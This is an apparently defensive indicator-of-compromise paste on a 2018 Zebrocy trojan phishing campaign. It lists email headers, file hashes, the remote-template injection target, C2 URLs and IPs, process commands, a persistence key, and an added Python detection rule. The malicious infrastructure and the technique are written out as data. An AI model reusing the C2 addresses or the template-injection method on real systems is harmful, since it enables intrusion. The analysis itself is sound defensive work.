VRad

#Zebrocy_181018

Oct 18th, 2018
#IOC #OptiData #VR #Zebrocy #Trojan #xmltarget #W97M

https://pastebin.com/sXcERsQd
exfiltrated data by @Jan0fficial https://pastebin.com/1mR0rZz7
identified by @Techhelplistcom

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_zebrocy_181018/
https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
https://www.scmagazineuk.com/sofacy-rolls-zebrocy-toolkit-hit-government-targets/article/1486758

attack_vector
--------------
email attach .docx > xml.rels > GET .dotm > macro > exe

email_headers
--------------
Received: from st04.mi6.kiev.ua ([91.198.36.36])
by out16.mi6.kiev.ua with esmtps (TLSv1:DHE-RSA-AES256-SHA:256)
(Exim 4.90_1)
(envelope-from <upap.mfa.gov@i.ua>)
id 1gD2qn-0006Tb-0i
for user1@victim000; Thu, 18 Oct 2018 10:36:09 +0300
Received: from web by st04.mi6.kiev.ua with local (Exim 4.80.1)
(envelope-from <upap.mfa.gov@i.ua>)
id 1gD2qm-0004NU-RT
for user1@victim000; Thu, 18 Oct 2018 10:36:08 +0300
To: user1@victim000
Subject: 41500029
From: Політичний департамент <upap.mfa.gov@i.ua>
Date: Thu, 18 Oct 2018 10:36:08 +0300
MIME-Version: 1.0
X-Mailer: I.UA Mail System
X-Server: st04.mi6.kiev.ua
X-Sender-IP: 176.119.30.208
X-User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0

email_subjects
--------------
41500029

files
--------------
SHA-256 c20e5d56b35992fe74e92aebb09c40a9ec4f3d9b3c2a01efbe761fa7921dd97f
File name 1500029.docx
File size 11.4 KB

SHA-256 86bb3b00bcd4878b081e4e4f126bba321b81a17e544d54377a0f590f95209e46
File name Note_template.dotm
File size 401 KB

SHA-256 c91843a69dcf3fdad0dac1b2f0139d1bb072787a1cfcf7b6e34a96bc3c081d65
File name ~office.exe
File size 353.5 KB

SHA-256 074a5836c5973bb53ab02c2bad66a4743b65c20fd6bf602cfaf09219f32d2426
File name mslicsrv.exe (mcrthost.exe)
File size 164 KB

activity
**************

docx > settings.xml.rels > Target="http://185.203.118.198/documents/Note_template.dotm"

http://185.203.118.198/documents/Note_template.dotm

http://185.203.118.198/en_action_device/center_correct_customer/drivers-i7-x86.php?tbm=C4BA3647

netwrk
--------------
185.203.118.198 OPTIONS /documents/ HTTP/1.1 Microsoft Office Protocol Discovery
185.203.118.198 OPTIONS / HTTP/1.1 Microsoft-WebDAV-MiniRedir/6.1.7601
185.203.118.198 GET /documents/Note_template.dotm HTTP/1.1 Mozilla/4.0
185.203.118.198 HEAD /documents/Note_template.dotm HTTP/1.1 Microsoft Office Existence Discovery
185.203.118.198 POST /en_action_device/center_correct_customer/drivers-i7-x86.php?tbm=AC38D1C7 HTTP/1.0 (application/x-www-form-urlencoded) Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
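
The netwrk lines show the sequence a Word remote-template fetch leaves in a proxy log: Office Protocol Discovery and WebDAV-MiniRedir OPTIONS requests, then a GET of the .dotm, then an Existence Discovery HEAD. The Python below is an added example, not part of this paste; it turns that sequence into a detection rule and runs it over a constructed log in the same column layout (a client column added, 203.0.113.x addresses in place of the real server). A template GET is flagged only when a discovery request from the same client to the same server precedes it, so a plain browser download of a .dotm is not reported.

```python
import re

# Mirrors the layout of the netwrk lines above, with a client column added:
# <client> <server> <method> <path> HTTP/1.x <user-agent>
LOG_RE = re.compile(
    r"^(?P<client>\S+) (?P<server>\S+) (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01] (?P<ua>.+)$"
)
# User-agent prefixes Word/WebDAV send while probing a server before fetching a template.
OFFICE_DISCOVERY_UA = (
    "Microsoft Office Protocol Discovery",
    "Microsoft-WebDAV-MiniRedir",
    "Microsoft Office Existence Discovery",
)
TEMPLATE_EXT = (".dotm", ".dotx", ".dot")

# Constructed proxy log (not real traffic): client 10.0.0.5 reproduces the
# sequence from the netwrk section against a documentation-range address;
# 10.0.0.7 fetches an ordinary page; 10.0.0.9 downloads a template without
# any Office discovery traffic first.
SAMPLE_LOG = """\
10.0.0.5 203.0.113.10 OPTIONS /documents/ HTTP/1.1 Microsoft Office Protocol Discovery
10.0.0.5 203.0.113.10 OPTIONS / HTTP/1.1 Microsoft-WebDAV-MiniRedir/6.1.7601
10.0.0.5 203.0.113.10 GET /documents/Note_template.dotm HTTP/1.1 Mozilla/4.0
10.0.0.5 203.0.113.10 HEAD /documents/Note_template.dotm HTTP/1.1 Microsoft Office Existence Discovery
10.0.0.7 203.0.113.20 GET /index.html HTTP/1.1 Mozilla/5.0
10.0.0.9 203.0.113.30 GET /files/Letter.dotm HTTP/1.1 Mozilla/5.0
"""


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match the layout."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_remote_template_fetches(lines):
    """Flag (client, server, path) when an Office/WebDAV discovery request from a
    client is followed by that client's GET of a Word template from the same server."""
    discovery_seen = set()
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["client"], rec["server"])
        if rec["ua"].startswith(OFFICE_DISCOVERY_UA):
            discovery_seen.add(key)
        # Drop any query string before testing the extension.
        path = rec["path"].split("?", 1)[0].lower()
        if rec["method"] == "GET" and path.endswith(TEMPLATE_EXT) and key in discovery_seen:
            hits.append((rec["client"], rec["server"], rec["path"]))
    return hits


if __name__ == "__main__":
    for client, server, path in detect_remote_template_fetches(SAMPLE_LOG.splitlines()):
        print("remote template fetch: %s -> %s%s" % (client, server, path))
```

The rule is order-sensitive, so feed it lines in time order. The discovery requests alone are worth a lower-severity alert as well, since Word sends them only when a document references a resource on that server.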

comp
--------------
WINWORD.EXE 185.203.118.198:80:80
svchost.exe 185.203.118.198:80:80
WINWORD.EXE 185.203.118.198:80:80
~office.exe 185.203.118.198:80:80
WINWORD.EXE 185.203.118.198:80:80
mslicsrv.exe 138.204.170.189:443:443
mslicsrv.exe 138.204.170.189:443:443

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Users\operator\AppData\Roaming\Network\~office.exe
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n
C:\Windows\SysWOW64\cmd.exe /c SYSTEMINFO & TASKLIST
"C:\Users\operator\AppData\Roaming\Capability\mslicsrv.exe"

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2018 17:11
AudioDrv c:\users\operator\appdata\roaming\capability\mslicsrv.exe 15.10.2018 16:51

drop
--------------
C:\Users\operator\AppData\Roaming\Network\~office.exe
C:\Users\operator\AppData\Roaming\Capability\mslicsrv.exe

# # #
https://www.virustotal.com/#/file/c20e5d56b35992fe74e92aebb09c40a9ec4f3d9b3c2a01efbe761fa7921dd97f/details
https://www.virustotal.com/#/file/86bb3b00bcd4878b081e4e4f126bba321b81a17e544d54377a0f590f95209e46/details
https://www.virustotal.com/#/file/c91843a69dcf3fdad0dac1b2f0139d1bb072787a1cfcf7b6e34a96bc3c081d65/details
https://www.virustotal.com/#/file/074a5836c5973bb53ab02c2bad66a4743b65c20fd6bf602cfaf09219f32d2426/details

https://analyze.intezer.com/#/analyses/6281721d-1810-487d-9fa1-fcea5e8dc109
https://analyze.intezer.com/#/analyses/e0c0fd5b-3aec-4b81-a685-e2815fac6807